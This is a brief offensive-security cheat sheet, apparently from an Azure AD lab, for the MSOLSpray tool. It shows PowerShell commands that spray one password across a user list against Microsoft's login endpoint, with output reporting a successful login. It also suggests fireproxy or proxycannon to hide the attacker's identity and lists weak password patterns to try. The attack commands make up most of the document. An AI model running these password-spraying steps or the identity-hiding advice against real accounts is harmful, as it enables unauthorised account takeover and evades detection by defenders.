MSOLSpray

Usage

To spray a password across multiple accounts.

PS C:\AzAD\Tools> Import-Module .\MSOLSpray\MSOLSpray.ps1
PS C:\AzAD\Tools> Invoke-MSOLSpray -UserList .\valid.txt -Password V3ryH4rdt0Cr4ckN0OneC@nGu355ForT3stUs3r -Verbose
[*] There are 2 total users to spray.
[*] Now spraying Microsoft Online.
[*] Current date and time: 02/28/2024 07:36:23
VERBOSE: POST https://login.microsoft.com/common/oauth2/token with -1-byte payload
VERBOSE: POST https://login.microsoft.com/common/oauth2/token with -1-byte payload
VERBOSE: received 3450-byte response of content type application/json; charset=utf-8
[*] SUCCESS! [email protected] : V3ryH4rdt0Cr4ckN0OneC@nGu355ForT3stUs3r

You can combine that with fireproxy or proxycannon to hide your identity.

Patterns

  • <month>@<year>
  • <season><year>
  • <season><year>!
  • <companyname><plz>
  • <companyname><plz>!